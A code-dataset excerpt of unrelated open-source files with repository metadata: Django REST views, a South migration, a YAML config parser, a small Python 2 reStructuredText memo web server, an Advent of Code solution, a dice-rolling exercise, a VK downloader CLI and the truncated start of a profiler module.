sehgalayush1/RestAPIDjango | snippets/views.py | 1 | 1253 | from snippets.models import Snippet
from snippets.serializers import SnippetSerializer, UserSerializer
from django.contrib.auth.models import User
from rest_framework import permissions, renderers
from snippets.permissions import IsOwnerOrReadOnly
from rest_framework.decorators import api_view, detail_route
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework import viewsets
@api_view(['GET'])
def api_root(request, format=None):
return Response({
'users': reverse('user-list', request=request, format=format),
'snippets': reverse('snippet-list', request=request, format=format),
})
class UserViewSet(viewsets.ReadOnlyModelViewSet):
queryset = User.objects.all()
serializer_class = UserSerializer
class SnippetViewSet(viewsets.ModelViewSet):
queryset = Snippet.objects.all()
serializer_class = SnippetSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
@detail_route(renderer_classes=[renderers.StaticHTMLRenderer])
def highlight(self, request, *args, **kwargs):
snippet = self.get_object()
return Response(snippet.highlighted)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
| gpl-3.0 | -8,928,990,795,269,132,000 | 31.973684 | 81 | 0.787709 | false | 3.903427 | false | false | false |
universalcore/unicore-mc | unicoremc/migrations/0021_auto__del_field_project_repo_url__del_field_project_base_repo_url__del.py | 1 | 8224 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Project.repo_url'
db.delete_column(u'unicoremc_project', 'repo_url')
# Deleting field 'Project.base_repo_url'
db.delete_column(u'unicoremc_project', 'base_repo_url')
# Deleting field 'Project.repo_git_url'
db.delete_column(u'unicoremc_project', 'repo_git_url')
def backwards(self, orm):
# Adding field 'Project.repo_url'
db.add_column(u'unicoremc_project', 'repo_url',
self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True),
keep_default=False)
# Adding field 'Project.base_repo_url'
db.add_column(u'unicoremc_project', 'base_repo_url',
self.gf('django.db.models.fields.URLField')(default='', max_length=200),
keep_default=False)
# Adding field 'Project.repo_git_url'
db.add_column(u'unicoremc_project', 'repo_git_url',
self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'unicoremc.apptype': {
'Meta': {'ordering': "('title',)", 'object_name': 'AppType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'project_type': ('django.db.models.fields.CharField', [], {'default': "'unicore-cms'", 'max_length': '256'}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'unicoremc.localisation': {
'Meta': {'ordering': "('language_code',)", 'object_name': 'Localisation'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '3'})
},
u'unicoremc.project': {
'Meta': {'ordering': "('application_type__title', 'country')", 'object_name': 'Project'},
'application_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['unicoremc.AppType']", 'null': 'True', 'blank': 'True'}),
'available_languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['unicoremc.Localisation']", 'null': 'True', 'blank': 'True'}),
'cms_custom_domain': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'default_language': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_language'", 'null': 'True', 'to': u"orm['unicoremc.Localisation']"}),
'external_repos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'external_projects'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['unicoremc.ProjectRepo']"}),
'frontend_custom_domain': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'ga_account_id': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'ga_profile_id': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hub_app_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'project_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'initial'", 'max_length': '50'}),
'team_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'unicoremc.projectrepo': {
'Meta': {'object_name': 'ProjectRepo'},
'base_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'git_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'repo'", 'unique': 'True', 'primary_key': 'True', 'to': u"orm['unicoremc.Project']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['unicoremc'] | bsd-2-clause | 2,015,478,026,492,564,700 | 70.521739 | 223 | 0.559703 | false | 3.589699 | false | false | false |
jmchilton/lwr | lwr/messaging/__init__.py | 1 | 1079 | """ This module contains the server-side only code for interfacing with
message queues. Code shared between client and server can be found in
submodules of ``lwr.lwr_client``.
:mod:`lwr.messaging.bind_amqp` Module
------------------------------
.. automodule:: lwr.messaging.bind_amqp
:members:
:undoc-members:
:show-inheritance:
"""
from ..messaging import bind_amqp
from six import itervalues
def bind_app(app, queue_id, connect_ssl=None):
connection_string = __id_to_connection_string(app, queue_id)
queue_state = QueueState()
for manager in itervalues(app.managers):
bind_amqp.bind_manager_to_queue(manager, queue_state, connection_string, connect_ssl)
return queue_state
class QueueState(object):
""" Passed through to event loops, should be "non-zero" while queues should
be active.
"""
def __init__(self):
self.active = True
def deactivate(self):
self.active = False
def __nonzero__(self):
return self.active
def __id_to_connection_string(app, queue_id):
return queue_id
| apache-2.0 | 2,951,453,091,740,333,600 | 24.093023 | 93 | 0.665431 | false | 3.682594 | false | false | false |
o2r-project/o2r-meta | parsers/parse_erc_config.py | 1 | 4786 | """
Copyright (c) 2016, 2017 - o2r project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ['ParseErcConfig']
import os
import yaml
from helpers.helpers import *
ID = 'o2r erc configuration file (erc.yml) parser'
FORMATS = ['.yml']
class ParseErcConfig:
@staticmethod
def get_id():
return str(ID)
@staticmethod
def get_formats():
return FORMATS
@staticmethod
def parse(**kwargs):
is_debug = False
try:
path_file = kwargs.get('p', None)
MASTER_MD_DICT = kwargs.get('md', None)
is_debug = kwargs.get('is_debug', None)
global erc_id
erc_id = None
global erc_spec_version
erc_spec_version = None
global basedir
basedir = kwargs.get('bd', None)
erc_config = yaml.load(open(path_file), Loader=yaml.FullLoader)
if erc_config is not None:
# id and spec_version:
if 'id' in erc_config:
if erc_config['id'] is not None:
MASTER_MD_DICT['id'] = erc_config['id']
erc_id = erc_config['id']
if 'spec_version' in erc_config:
if erc_config['spec_version'] is not None:
erc_spec_version = erc_config['spec_version']
status_note(['parsing ', path_file, ' for compendium ', erc_id,
' with version ', erc_spec_version, ' and basedir ', basedir, ' :\n',
str(erc_config)], d=is_debug)
# main and display file
if 'main' in erc_config:
if erc_config['main'] is not None:
if basedir:
# relative path handling happens outside of parser for main
# erc.yml paths are by definition relative to erc.yml
abs_path = os.path.abspath(os.path.join(os.path.dirname(path_file), erc_config['main']))
MASTER_MD_DICT['mainfile'] = abs_path
else:
MASTER_MD_DICT['mainfile'] = erc_config['main']
else:
status_note('warning: no main file in erc.yml', d=is_debug)
if 'display' in erc_config:
if erc_config['display'] is not None:
if basedir:
# relative path handling for displayfile
abs_path = os.path.abspath(os.path.join(os.path.dirname(path_file), erc_config['display']))
MASTER_MD_DICT['displayfile'] = os.path.relpath(abs_path, basedir)
else:
MASTER_MD_DICT['displayfile'] = erc_config['display']
else:
status_note('warning: no display file in erc.yml', d=is_debug)
# licenses:
if 'licenses' in erc_config:
if erc_config['licenses'] is not None:
MASTER_MD_DICT['license'] = erc_config['licenses']
# convention:
if 'convention' in erc_config:
if erc_config['convention'] is not None:
MASTER_MD_DICT['convention'] = erc_config['convention']
else:
status_note(['error parsing erc.yml from', str(path_file)], d=is_debug)
return MASTER_MD_DICT
except yaml.YAMLError as yexc:
if hasattr(yexc, 'problem_mark'):
if yexc.context is not None:
status_note(['yaml error\n\t', str(yexc.problem_mark), '\n\t', str(yexc.problem), ' ', str(yexc.context)], d=True)
return 'error'
else:
status_note(['yaml error\n\t', str(yexc.problem_mark), '\n\t', str(yexc.problem)],
d=is_debug)
return 'error'
else:
status_note(['! error: unable to parse yaml \n\t', str(yexc)], d=is_debug)
return 'error'
except Exception as exc:
status_note(str(exc), d=is_debug)
return 'error' | apache-2.0 | -5,145,742,858,696,219,000 | 39.91453 | 134 | 0.514626 | false | 4.158123 | true | false | false |
saiias/pymamemose | pymamemose/pymamemose.py | 1 | 12369 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import BaseHTTPServer as bts
import subprocess
import urlparse
import os
import json
import urllib2
import re
import codecs
HOME_DIR = os.environ["HOME"]
try:
SETTING=json.load(open(HOME_DIR+'/.pymamemose.json'))
except IOError,(errno,strerrno):
print "Don't exist ~/.pymamemose.json"
SETTING={"DOCUMENT_ROOT":"~/Dropbox/memo","RECENT_NUM":5,"PORT":8000,"REST_PATTERN":".rst","IGNORE_FILE":""}
DOCUMENT_ROOT =os.path.expanduser(SETTING["DOCUMENT_ROOT"]) if SETTING.has_key("DOCUMENT_ROOT") else "~/Dropbox/memo"
RECENT_NUM =SETTING["RECENT_NUM"] if SETTING.has_key("RECENT_NUM") else 5
PORT = SETTING["PORT"] if SETTING.has_key("PORT") else 8000
REST_PATTERN =SETTING["REST_PATTERN"] if SETTING.has_key("REST_PATTERN") else ".rst"
IGNORE_FILE =SETTING["IGNORE_FILE"] if SETTING.has_key("IGNORE_FILE") else ""
class GetHandler(bts.BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/favicon.ico':
self.send_error(404)
else:
parsed_path = urlparse.urlparse(self.path)
self.send_response(200)
self.send_header("Content-type","text/html")
res = Pymamemose(parsed_path)
self.end_headers()
self.wfile.write(res.make_html())
return
class Pymamemose():
def __init__(self,parsed_path):
self.parsed_path=parsed_path
self.restpatobj =re.compile(REST_PATTERN)
self.ignoreobj = re.compile(IGNORE_FILE)
def make_html(self):
path = DOCUMENT_ROOT+self.parsed_path.path
query=urllib2.unquote(self.parsed_path.query)
if path == DOCUMENT_ROOT + "/search":
res = self.req_search(path,query)
elif os.path.isdir(path):
res = self.req_index(path,query)
elif os.path.isfile(path):
res = self.req_file(path,query)
else:
print "failture"
return res
def header_html(self,title,path,q=""):
html = """<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<title> %s </title>
"""%(title)
html+="""
<style type="text/css">
<!--
body {
margin: auto;
padding: 0 2em;
max-width: 80%;
border-left: 1px solid black;
border-right: 1px solid black;
font-size: 100%;
line-height: 140%;
}
pre {
border: 1px solid #090909;
background-color: #f8f8f8;
padding: 0.5em;
margin: 0.5em 1em;
}
code {
border: 1px solid #cccccc;
background-color: #f8f8f8;
padding: 2px 0.5em;
margin: 0 0.5em;
}
a {
text-decoration: none;
}
a:link, a:visited, a:hover {
color: #4444cc;
}
a:hover {
text-decoration: underline;
}
h1, h2, h3 {
font-weight: bold;
color: #2f4f4f;
}
h1 {
font-size: 200%;
line-height: 100%;
margin: 1em 0;
border-bottom: 1px solid #2f4f4f;
}
h2 {
font-size: 175%;
line-height: 100%;
margin: 1em 0;
padding-left: 0.5em;
border-left: 0.5em solid #2f4f4f;
}
h3 {
font-size: 150%;
line-height: 100%;
margin: 1em 0;
}
h4, h5 {
font-weight: bold;
color: #000000;
margin: 1em 0 0.5em;
}
h4 { font-size: 125% }
h5 { font-size: 100% }
p {
margin: 0.7em 1em;
text-indent: 1em;
}
div.footnotes {
padding-top: 1em;
color: #090909;
}
div#header {
margin-top: 1em;
padding-bottom: 1em;
border-bottom: 1px dotted black;
}
div#header > form {
display: float;
float: right;
text-align: right;
}
a.filename {
color: #666666;
a}
footer {
border-top: 1px dotted black;
padding: 0.5em;
font-size: 80%;
text-align: right;
margin: 5em 0 1em;
}
blockquote {
margin: 1em 3em;
border: 2px solid #999;
padding: 0.3em 0;
background-color: #f3fff3;
}
hr {
height: 1px;
border: none;
border-top: 1px solid black;
}
table {
padding: 0;
margin: 1em 2em;
border-spacing: 0;
border-collapse: collapse;
}
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0;
}
table tr:nth-child(2n) {
background-color: #f8f8f8;
}
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
text-align: left;
margin: 0;
padding: 6px 13px;
}
table tr td {
border: 1px solid #cccccc;
text-align: left;
margin: 0;
padding: 6px 13px;
}
table tr th :first-child, table tr td :first-child {
margin-top: 0;
}
table tr th :last-child, table tr td :last-child {
margin-bottom: 0;
}
-->
</style>
<script>
function copy(text) {
prompt("Copy filepath below:", text);
}
</script>
</head>
<body>
"""
link_str=""
uri = ""
fp =path.replace(DOCUMENT_ROOT,'').split('/')
for i in fp:
if i ==u'':
continue
uri +='/'+i
if os.path.isfile(DOCUMENT_ROOT+uri) or os.path.isdir(DOCUMENT_ROOT+uri):
link_str += '/' + "<a href='%s'>%s</a>"%(uri,i)
link_str += "<a class='filename' href=\"javascript:copy('%s');\">[copy]</a>"%(path)
link_str = "<a href='/'>%s</a>"%(DOCUMENT_ROOT) + link_str
search="""
<form action="/search" method="get",accept-charset="UTF-8">
<input name="path" type="hidden" value="" />
<input name="q" type="text" value="" size="24" />
<input type="submit" value="search" />
</form>
"""
return html+"<div id=\"header\">%s %s</div>"%(link_str,search)
def footer_html(self):
html ="""
<footer>
<a href="https://github.com/saiias/pymamemose">pymamemose: ReStructuredText memo server</a>
</footer>
</body>
</html>
"""
return html
def req_search(self,path,query):
query=query.split("&q=")[1]
found = self.find(path,query)
html_title = "Serch in "+path
title = "</div><h1>Seach in %s </h1>"%(path)
body =""
if query == "":
body+="<h2>No Keyword </h2>"
elif len(found)==0:
body+="<h2>Not Found</h2>"
elif len(found)>0:
body +='<ul>'
for k,v in found.items():
# size = float(getFileSize(v))/1024
size = 1.0
v=v.replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href="%s">%s</a>
<a class='filename' href="javascript:copy('%s');\">[%s , %.1f KB]</a></li>
'''%(v,k,v,k,size)
body +='<ul>'
body = title+body
header_html = self.header_html(html_title,path,query)
footer_html = self.footer_html()
return header_html+body+footer_html
def req_file(self,req,res):
"""
アクセスされた先がファイルのとき呼び出される。
そのファイルがRest記法であれば、rst2htmlで変換してhtmlを出力する。
req:アクセスされたパス
res:クエリ
"""
header_html = self.header_html(req,req)
footer_html = self.footer_html()
body = ""
if isMatchedFile(self.restpatobj,os.path.splitext(req)[1]):
body +=subprocess.check_output(['rst2html.py',req])
body=body.split('<body>')[1]
body=body.split('</body>')[0]
else:
"""
ReSTファイル以外の挙動
"""
f=open(req,'r')
body += f.read()
f.close()
return header_html.encode('ascii')+body+footer_html.encode('ascii')
def req_index(self,req,res):
"""
アクセスされた先がフォルダのとき呼び出される。
フォルダ内を、ディレクトリ、ReSTファイル、その他のファイルと分類して、hmtlを出力する。
req:アクセスされたパス
res:クエリ
"""
global RECENT_NUM
dirs,rest,others=self.directory_files(req)
body = "</div><h1>Index of %s </h1>"%(req)
if RECENT_NUM > 0:
body += "<h2>Recent:</h2>"
recent = self.recent_files()
if len(recent) < RECENT_NUM:
RECENT_NUM = len(recent)
body +='<ul>'
index = 0
for k,v in sorted(recent.items(),key=lambda x:x[1][1]):
size = float(getFileSize(v[0]))/1024
if index == RECENT_NUM:
break
v[0] =v[0].replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s , %.1f KB]</a></li>
'''%(v[0],k,v[0],k,size)
index +=1
body +='</ul>'
body += "<h2>Directories:</h2>"
if len(dirs)>0:
body +='<ul>'
for k,v in dirs.items():
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s,dir]</a></li>
'''%(k,k,v,k)
body +='</ul>'
body += "<h2>ReST documents:</h2>"
if len(rest)>0:
body +='<ul>'
for k,v in rest.items():
size = float(getFileSize(v))/1024
v=v.replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[ %s , %.1f KB]</a></li>
'''%(v,k,v,k,size)
body +='</ul>'
body += "<h2>Other files:</h2>"
if len(others)>0:
body +='<ul>'
for k,v in others.items():
size = float(getFileSize(v))/1024
v=v.replace(DOCUMENT_ROOT,'')
body +='''
<li><a href=" %s "> %s </a>
<a class='filename' href="javascript:copy(' %s ');\">[%s , %.1f KB]</a></li>
'''%(k,k,v,k,size)
body +='</ul>'
header_html = self.header_html(req,req)
footer_html = self.footer_html()
return header_html+body+footer_html
def find(self,path,query):
"""
クエリに指定された文字列をサイト内で検索する。
もし見つかればそのファイル名をキー、そのファイルまでのパスをバリューとして辞書に入れる。
検索が終わると辞書を返す。
"""
found = dict()
for root,dirs,files in os.walk(DOCUMENT_ROOT):
for fl in files:
for line in codecs.open(root+'/'+fl,'r','utf-8'):
print type(line)
if line.find(query.decode('utf-8')) != -1:
found[fl]=root+'/'+fl
return found
def recent_files(self):
recent ={}
for root,dirs,files in os.walk(DOCUMENT_ROOT):
for file in files:
if not isMatchedFile(self.ignoreobj,file):
mtime = os.stat(root+'/'+file)
recent[file]=[root+'/'+file,mtime]
return recent
def directory_files(self,path):
dirs =dict()
rest = dict()
others = dict()
df = os.listdir(path)
for item in df:
if os.path.isdir(path+"/"+item):
dirs[item]=path+"/"+item
if os.path.isfile(path+"/"+item):
if isMatchedFile(self.restpatobj,item):
rest[item]=path+'/'+item
else:
if not isMatchedFile(self.ignoreobj,item):
others[item]= path+'/'+item
return dirs,rest,others
def abspath(path):
return os.path.abspath(path)
def getFileSize(file):
return os.path.getsize(file)
def isMatchedFile(patobj,filename):
"""
拡張子がpatobjだったらTrue
そうでないならFalse
>>> pat = re.compile(".(rst|rest|txt)$")
>>> isMatchedFile(pat,"test.rst")
True
>>> isMatchedFile(pat,"test.doc")
False
>>> pattern = re.compile("TAGS")
>>> isMatchedFile(pattern,"DS_STORE")
False
>>> isMatchedFile(pattern,"TAGS")
True
"""
match = patobj.search(filename)
return False if (match == None) else True
def command():
server = bts.HTTPServer(('localhost', PORT), GetHandler)
print 'Starting server'
server.serve_forever()
if __name__ == '__main__':
command()
| bsd-3-clause | -6,843,100,928,478,583,000 | 26.029545 | 117 | 0.524426 | false | 3.012411 | false | false | false |
hubbardgary/AdventOfCode | day01.py | 1 | 2209 | # --- Day 1: Not Quite Lisp ---
#
# Santa was hoping for a white Christmas, but his weather machine's "snow" function is powered by stars, and he's fresh
# out! To save Christmas, he needs you to collect fifty stars by December 25th.
#
# Collect stars by helping Santa solve puzzles. Two puzzles will be made available on each day in the advent calendar;
# the second puzzle is unlocked when you complete the first. Each puzzle grants one star. Good luck!
#
# Here's an easy puzzle to warm you up.
#
# Santa is trying to deliver presents in a large apartment building, but he can't find the right floor - the directions
# he got are a little confusing. He starts on the ground floor (floor 0) and then follows the instructions one
# character at a time.
#
# An opening parenthesis, (, means he should go up one floor, and a closing parenthesis, ), means he should go down
# one floor.
#
# The apartment building is very tall, and the basement is very deep; he will never find the top or bottom floors.
#
# For example:
#
# (()) and ()() both result in floor 0.
# ((( and (()(()( both result in floor 3.
# ))((((( also results in floor 3.
# ()) and ))( both result in floor -1 (the first basement level).
# ))) and )())()) both result in floor -3.
# To what floor do the instructions take Santa?
#
#
#
# --- Part Two ---
#
# Now, given the same instructions, find the position of the first character that causes him to enter the basement
# (floor -1). The first character in the instructions has position 1, the second character has position 2, and so on.
#
# For example:
#
# ) causes him to enter the basement at character position 1.
# ()()) causes him to enter the basement at character position 5.
# What is the position of the character that causes Santa to first enter the basement?
instructions = open("day01_input").read()
# Part 1
floor_no = instructions.count('(') - instructions.count(')')
print("Santa ends up on floor {0}".format(floor_no))
# Part 2
floor_no = 0
for n, i in enumerate(instructions):
floor_no += 1 if i == '(' else -1
if floor_no == -1:
print("Santa enters basement at instruction {0}".format(n + 1)) # Add 1 because the instructions are 1-based
break
| mit | -5,081,958,315,049,967,000 | 39.907407 | 119 | 0.70077 | false | 3.545746 | false | false | false |
vhaasteren/piccard | piccard/hmcwrappers.py | 1 | 3004 | #!/usr/bin/env python
# encoding: utf-8
# vim: tabstop=4:softtabstop=4:shiftwidth=4:expandtab
from __future__ import division, print_function
import numpy as np
import math
import scipy.linalg as sl, scipy.special as ss
from functools import partial
from transformations import *
from stingrays import *
from fullstingray import *
def hmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the full stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=fullStingrayLikelihood,
**kwargs)
def hpHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=hpStingrayLikelihood,
**kwargs)
def tmHmcLikelihood1(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=tmStingrayLikelihood,
**kwargs)
def tmHmcLikelihood2(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=tmStingrayLikelihood2,
**kwargs)
def muHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=muStingrayLikelihood,
**kwargs)
def msHmcLikelihood(h5filename=None, jsonfilename=None, **kwargs):
"""Wrapper for the compound of the stingray transformation and the interval
transformation
"""
if 'wrapperclass' in kwargs:
raise ValueError("hmcLikelihood already pre-sets wrapperclass")
return intervalLikelihood(h5filename=h5filename,
jsonfilename=jsonfilename,
wrapperclass=msStingrayLikelihood,
**kwargs)
| gpl-3.0 | 4,308,661,855,888,951,300 | 33.136364 | 84 | 0.712383 | false | 4.248939 | false | false | false |
arantebillywilson/python-snippets | py2/htp/ch04/fig04_07.py | 2 | 1226 | #!/usr/bin/python
#
# fig04_07.py
# Roll a six-sided die 6000 times.
#
# Author: Billy Wilson Arante
# Created: 2016/08/06 PHT
#
# Attribution: Python How to Program, 1st Ed. by Deitel & Deitel
#
import random
def main():
"""Main"""
# Initialize
frequency1 = 0
frequency2 = 0
frequency3 = 0
frequency4 = 0
frequency5 = 0
frequency6 = 0
for roll in range(1, 6001): # Rolls a die 6000 times
face = random.randrange(1, 7) # Random number from 1 to 7
# Count frequencies
if face == 1:
frequency1 += 1
elif face == 2:
frequency2 += 1
elif face == 3:
frequency3 += 1
elif face == 4:
frequency4 += 1
elif face == 5:
frequency5 += 1
elif face == 6:
frequency6 += 1
else:
print "It should never get here!"
print "%4s %13s" % ("Face", "Frequency")
print "%4s %13s" % (1, frequency1)
print "%4s %13s" % (2, frequency2)
print "%4s %13s" % (3, frequency3)
print "%4s %13s" % (4, frequency4)
print "%4s %13s" % (5, frequency5)
print "%4s %13s" % (6, frequency6)
if __name__ == "__main__":
main()
| mit | 8,852,127,518,474,271,000 | 20.892857 | 71 | 0.520392 | false | 3.260638 | false | false | false |
kardapoltsev/vkdownloader | vk.py | 1 | 2091 | #!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
# Copyright 2013 Alexey Kardapoltsev
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json, sys, os
from vkdownloader import VkDownloader
def process_music(args):
if args.action == "load":
vk.load(args.user, args.dest, args.clean)
elif args.action == "list":
vk.show(args.user)
elif args.action == "play":
vk.play(args.user)
else:
print("unknown action")
def process_friends(args):
if args.action == "list":
vk.show_friends(args.user)
else:
print("unknown action")
topParser = argparse.ArgumentParser()
topParser.add_argument("-u", "--user", help = "user id")
subParsers = topParser.add_subparsers(title = "Command categories")
music = subParsers.add_parser("music", description = "working with music")
friends = subParsers.add_parser("friends", description = "working with friends")
friends.add_argument("action", help = "friends actions", choices=["list"])
friends.set_defaults(func = process_friends)
music.add_argument("action", help = "music actions", choices=["list", "load", "play"])
music.add_argument("-d", "--dest", help = "destination directory for music download, default is current dir")
music.add_argument("-c", "--clean", dest='clean', action='store_true', help = "with this options destination directory will be cleaned")
music.set_defaults(clean = False)
music.set_defaults(func = process_music)
try:
import argcomplete
argcomplete.autocomplete(topParser)
except ImportError:
pass
args = topParser.parse_args()
vk = VkDownloader()
args.func(args)
| apache-2.0 | 8,169,627,644,131,124,000 | 31.671875 | 136 | 0.725968 | false | 3.556122 | false | false | false |
yadt/yadt-config-rpm-maker | src/config_rpm_maker/utilities/profiler.py | 1 | 4724 | # yadt-config-rpm-maker
# Copyright (C) 2011-2013 Immobilien Scout GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
This module contains functions which were created for performance
tweaking. The test coverage of this module is low since it's main
purpose is to add logging information.
"""
from functools import wraps
from logging import getLogger
from time import time
